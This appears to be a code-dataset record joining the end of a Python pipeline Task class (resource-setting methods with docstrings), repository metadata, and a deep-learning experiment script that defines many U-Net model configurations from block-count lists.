from .pipeline import Pipeline # pylint: disable=cyclic-import
subst_command = re.sub(f"({ResourceFile._regex_pattern})|({ResourceGroup._regex_pattern})"
f"|({Task._regex_pattern})|({Pipeline._regex_pattern})",
handler,
command)
self._command.append(subst_command)
return self
def storage(self, storage):
"""
Set the task's storage size.
Examples
--------
Set the task's disk requirements to 1 Gi:
>>> t1 = p.new_task()
>>> (t1.storage('1Gi')
... .command(f'echo "hello"'))
Parameters
----------
storage: :obj:`str`
Returns
-------
:class:`.Task`
Same task object with storage set.
"""
self._storage = storage
return self
def memory(self, memory):
"""
Set the task's memory requirements.
Examples
--------
Set the task's memory requirement to 5GB:
>>> t1 = p.new_task()
>>> (t1.memory(5)
... .command(f'echo "hello"'))
Parameters
----------
memory: :obj:`str` or :obj:`float` or :obj:`int`
Value is in GB.
Returns
-------
:class:`.Task`
Same task object with memory requirements set.
"""
self._memory = memory
return self
def cpu(self, cores):
"""
Set the task's CPU requirements.
Examples
--------
Set the task's CPU requirement to 2 cores:
>>> t1 = p.new_task()
>>> (t1.cpu(2)
... .command(f'echo "hello"'))
Parameters
----------
cores: :obj:`str` or :obj:`float` or :obj:`int`
Returns
-------
:class:`.Task`
Same task object with CPU requirements set.
"""
self._cpu = cores
return self
def image(self, image):
"""
Set the task's docker image.
Examples
--------
Set the task's docker image to `alpine`:
>>> t1 = p.new_task()
>>> (t1.image('alpine:latest')
... .command(f'echo "hello"'))
Parameters
----------
image: :obj:`str`
Docker image to use.
Returns
-------
:class:`.Task`
Same task object with docker image set.
"""
self._image = image
return self
def _pretty(self):
s = f"Task '{self._uid}'" \
f"\tName:\t'{self.name}'" \
f"\tAttributes:\t'{self.attributes}'" \
f"\tImage:\t'{self._image}'" \
f"\tCPU:\t'{self._cpu}'" \
f"\tMemory:\t'{self._memory}'" \
f"\tStorage:\t'{self._storage}'" \
f"\tCommand:\t'{self._command}'"
return s
def __str__(self):
return self._uid
|
[
"daniel.zidan.king@gmail.com"
] |
daniel.zidan.king@gmail.com
|
1f4b6688675f5b730dc3dd73a877fc56530df03b
|
0e1e643e864bcb96cf06f14f4cb559b034e114d0
|
/Exps_7_v3/doc3d/W_w_Mgt_to_C_focus_div/ch032/Tcrop_s255_p20_j15/pyr_6s/L3/step09_6side_L3.py
|
bb36cd8c779761d81788e6554c71dce596961f80
|
[] |
no_license
|
KongBOy/kong_model2
|
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
|
1af20b168ffccf0d5293a393a40a9fa9519410b2
|
refs/heads/master
| 2022-10-14T03:09:22.543998
| 2022-10-06T11:33:42
| 2022-10-06T11:33:42
| 242,080,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 50,455
|
py
|
#############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
from tkinter import S
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
from step08_b_use_G_generate_W_w_M_to_Cx_Cy_combine import W_w_M_to_Cx_Cy
from step08_b_use_G_generate_0_util import Tight_crop
from step09_c_train_step import Train_step_W_w_M_to_Cx_Cy
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
use_what_gen_op = W_w_M_to_Cx_Cy( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 0) )
use_what_train_step = Train_step_W_w_M_to_Cx_Cy( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 15) )
use_hid_ch = 32
import time
start_time = time.time()
###############################################################################################################################################################################################
##################################
### 6side1
##################################
##### 5side1
# side1, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_1__2side_1__3side_1_4side_1_5s1_6s1 = [6, 0, 0, 0, 0, 0, 6]
# side2, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_2__2side_1__3side_1_4side_1_5s1_6s1 = [6, 1, 0, 0, 0, 1, 6]
pyramid_1side_2__2side_2__3side_1_4side_1_5s1_6s1 = [6, 2, 0, 0, 0, 2, 6]
pyramid_1side_2__2side_2__3side_2_4side_1_5s1_6s1 = [6, 3, 0, 0, 0, 3, 6]
pyramid_1side_2__2side_2__3side_2_4side_2_5s1_6s1 = [6, 4, 0, 0, 0, 4, 6]
# side3, 1 3 "6" 10 15 21 28 36 45 55, 10
pyramid_1side_3__2side_1__3side_1_4side_1_5s1_6s1 = [6, 1, 1, 0, 1, 1, 6]
pyramid_1side_3__2side_2__3side_1_4side_1_5s1_6s1 = [6, 2, 1, 0, 1, 2, 6]
pyramid_1side_3__2side_2__3side_2_4side_1_5s1_6s1 = [6, 3, 1, 0, 1, 3, 6]
pyramid_1side_3__2side_3__3side_1_4side_1_5s1_6s1 = [6, 2, 2, 0, 2, 2, 6]
pyramid_1side_3__2side_3__3side_2_4side_1_5s1_6s1 = [6, 3, 2, 0, 2, 3, 6]
pyramid_1side_3__2side_3__3side_3_4side_1_5s1_6s1 = [6, 3, 3, 0, 3, 3, 6]
pyramid_1side_3__2side_2__3side_2_4side_2_5s1_6s1 = [6, 4, 1, 0, 1, 4, 6]
pyramid_1side_3__2side_3__3side_2_4side_2_5s1_6s1 = [6, 4, 2, 0, 2, 4, 6]
pyramid_1side_3__2side_3__3side_3_4side_2_5s1_6s1 = [6, 4, 3, 0, 3, 4, 6]
pyramid_1side_3__2side_3__3side_3_4side_3_5s1_6s1 = [6, 4, 4, 0, 4, 4, 6]
# side4, 1 3 6 "10" 15 21 28 36 45 55, 20
pyramid_1side_4__2side_1__3side_1_4side_1_5s1_6s1 = [6, 1, 1, 1, 1, 1, 6]
pyramid_1side_4__2side_2__3side_1_4side_1_5s1_6s1 = [6, 2, 1, 1, 1, 2, 6]
pyramid_1side_4__2side_2__3side_2_4side_1_5s1_6s1 = [6, 3, 1, 1, 1, 3, 6]
pyramid_1side_4__2side_3__3side_1_4side_1_5s1_6s1 = [6, 2, 2, 1, 2, 2, 6]
pyramid_1side_4__2side_3__3side_2_4side_1_5s1_6s1 = [6, 3, 2, 1, 2, 3, 6]
pyramid_1side_4__2side_3__3side_3_4side_1_5s1_6s1 = [6, 3, 3, 1, 3, 3, 6]
pyramid_1side_4__2side_4__3side_1_4side_1_5s1_6s1 = [6, 2, 2, 2, 2, 2, 6]
pyramid_1side_4__2side_4__3side_2_4side_1_5s1_6s1 = [6, 3, 2, 2, 2, 3, 6]
pyramid_1side_4__2side_4__3side_3_4side_1_5s1_6s1 = [6, 3, 3, 2, 3, 3, 6]
pyramid_1side_4__2side_4__3side_4_4side_1_5s1_6s1 = [6, 3, 3, 3, 3, 3, 6]
pyramid_1side_4__2side_2__3side_2_4side_2_5s1_6s1 = [6, 4, 1, 1, 1, 4, 6]
pyramid_1side_4__2side_3__3side_2_4side_2_5s1_6s1 = [6, 4, 2, 1, 2, 4, 6]
pyramid_1side_4__2side_3__3side_3_4side_2_5s1_6s1 = [6, 4, 3, 1, 3, 4, 6]
pyramid_1side_4__2side_4__3side_2_4side_2_5s1_6s1 = [6, 4, 2, 2, 2, 4, 6]
pyramid_1side_4__2side_4__3side_3_4side_2_5s1_6s1 = [6, 4, 3, 2, 3, 4, 6]
pyramid_1side_4__2side_4__3side_4_4side_2_5s1_6s1 = [6, 4, 3, 3, 3, 4, 6]
pyramid_1side_4__2side_3__3side_3_4side_3_5s1_6s1 = [6, 4, 4, 1, 4, 4, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s1_6s1 = [6, 4, 4, 2, 4, 4, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s1_6s1 = [6, 4, 4, 3, 4, 4, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s1_6s1 = [6, 4, 4, 4, 4, 4, 6]
##### 5side2
# side2, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s1 = [6, 5, 0, 0, 0, 5, 6]
# side3, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_3__2side_2__3side_2_4side_2_5s2_6s1 = [6, 5, 1, 0, 1, 5, 6]
pyramid_1side_3__2side_3__3side_2_4side_2_5s2_6s1 = [6, 5, 2, 0, 2, 5, 6]
pyramid_1side_3__2side_3__3side_3_4side_2_5s2_6s1 = [6, 5, 3, 0, 3, 5, 6]
pyramid_1side_3__2side_3__3side_3_4side_3_5s2_6s1 = [6, 5, 4, 0, 4, 5, 6]
# side4, 1 3 "6" 10 15 21 28 36 45 55, 10
pyramid_1side_4__2side_2__3side_2_4side_2_5s2_6s1 = [6, 5, 1, 1, 1, 5, 6]
pyramid_1side_4__2side_3__3side_2_4side_2_5s2_6s1 = [6, 5, 2, 1, 2, 5, 6]
pyramid_1side_4__2side_3__3side_3_4side_2_5s2_6s1 = [6, 5, 3, 1, 3, 5, 6]
pyramid_1side_4__2side_4__3side_2_4side_2_5s2_6s1 = [6, 5, 2, 2, 2, 5, 6]
pyramid_1side_4__2side_4__3side_3_4side_2_5s2_6s1 = [6, 5, 3, 2, 3, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_2_5s2_6s1 = [6, 5, 3, 3, 3, 5, 6]
pyramid_1side_4__2side_3__3side_3_4side_3_5s2_6s1 = [6, 5, 4, 1, 4, 5, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s2_6s1 = [6, 5, 4, 2, 4, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s2_6s1 = [6, 5, 4, 3, 4, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s2_6s1 = [6, 5, 4, 4, 4, 5, 6]
##### 5side3
# side3, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s1 = [6, 5, 5, 0, 5, 5, 6]
# side4, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s1 = [6, 5, 5, 1, 5, 5, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s1 = [6, 5, 5, 2, 5, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s1 = [6, 5, 5, 3, 5, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s1 = [6, 5, 5, 4, 5, 5, 6]
##### 5side4
# side4, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s1 = [6, 5, 5, 5, 5, 5, 6]
##################################
### 6side2
##################################
##### 5side2
# side2, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s2 = [6, 6, 0, 0, 0, 6, 6]
# side3, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_3__2side_2__3side_2_4side_2_5s2_6s2 = [6, 6, 1, 0, 1, 6, 6]
pyramid_1side_3__2side_3__3side_2_4side_2_5s2_6s2 = [6, 6, 2, 0, 2, 6, 6]
pyramid_1side_3__2side_3__3side_3_4side_2_5s2_6s2 = [6, 6, 3, 0, 3, 6, 6]
pyramid_1side_3__2side_3__3side_3_4side_3_5s2_6s2 = [6, 6, 4, 0, 4, 6, 6]
# side4, 1 3 "6" 10 15 21 28 36 45 55, 10
pyramid_1side_4__2side_2__3side_2_4side_2_5s2_6s2 = [6, 6, 1, 1, 1, 6, 6]
pyramid_1side_4__2side_3__3side_2_4side_2_5s2_6s2 = [6, 6, 2, 1, 2, 6, 6]
pyramid_1side_4__2side_3__3side_3_4side_2_5s2_6s2 = [6, 6, 3, 1, 3, 6, 6]
pyramid_1side_4__2side_4__3side_2_4side_2_5s2_6s2 = [6, 6, 2, 2, 2, 6, 6]
pyramid_1side_4__2side_4__3side_3_4side_2_5s2_6s2 = [6, 6, 3, 2, 3, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_2_5s2_6s2 = [6, 6, 3, 3, 3, 6, 6]
pyramid_1side_4__2side_3__3side_3_4side_3_5s2_6s2 = [6, 6, 4, 1, 4, 6, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s2_6s2 = [6, 6, 4, 2, 4, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s2_6s2 = [6, 6, 4, 3, 4, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s2_6s2 = [6, 6, 4, 4, 4, 6, 6]
##### 5side3
# side3, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s2 = [6, 6, 5, 0, 5, 6, 6]
# side4, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s2 = [6, 6, 5, 1, 5, 6, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s2 = [6, 6, 5, 2, 5, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s2 = [6, 6, 5, 3, 5, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s2 = [6, 6, 5, 4, 5, 6, 6]
##### 5side4
# side4, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s2 = [6, 6, 5, 5, 5, 6, 6]
##################################
### 6side3
##################################
##### 5side3
# side3, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s3 = [6, 6, 6, 0, 6, 6, 6]
# side4, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s3 = [6, 6, 6, 1, 6, 6, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s3 = [6, 6, 6, 2, 6, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s3 = [6, 6, 6, 3, 6, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s3 = [6, 6, 6, 4, 6, 6, 6]
##### 5side4
# side4, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s3 = [6, 6, 6, 5, 6, 6, 6]
##################################
### 6side4
##################################
##### 5side4
# side4, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s4 = [6, 6, 6, 6, 6, 6, 6]
###############################################################################################################################################################################################
###############################################################################################################################################################################################
###############################################################################################################################################################################################
###################
############# 1s1
######### 2s1
##### 3s1
### 4s1
ch032_pyramid_1side_1__2side_1__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_1__2side_1__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
###################
############# 1s2
######### 2s1
##### 3s1
### 4s1
ch032_pyramid_1side_2__2side_1__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_1__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
######### 2s1
##### 3s1
### 4s1
ch032_pyramid_1side_2__2side_2__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s2
### 4s1
ch032_pyramid_1side_2__2side_2__3side_2_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_2_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_2__2side_2__3side_2_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_2_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
###################
############# 1s3
######### 2s1
##### 3s1
### 4s1
ch032_pyramid_1side_3__2side_1__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_1__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
######### 2s2
##### 3s1
### 4s1
ch032_pyramid_1side_3__2side_2__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_2__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s2
### 4s1
ch032_pyramid_1side_3__2side_2__3side_2_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_2__3side_2_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_3__2side_2__3side_2_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_2__3side_2_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_2__3side_2_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_2__3side_2_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_2__3side_2_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_2__3side_2_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
######### 2s3
##### 3s1
### 4s1
ch032_pyramid_1side_3__2side_3__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s2
### 4s1
ch032_pyramid_1side_3__2side_3__3side_2_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_2_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_3__2side_3__3side_2_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_2_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_2_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_2_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_2_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_2_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s3
### 4s1
ch032_pyramid_1side_3__2side_3__3side_3_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_3__2side_3__3side_3_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_3_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_3_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s3
ch032_pyramid_1side_3__2side_3__3side_3_4side_3_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_3_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_3_4side_3_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_3_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_3_4side_3_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_3_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s3, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
###################
############# 1s4
######### 2s1
##### 3s1
### 4s1
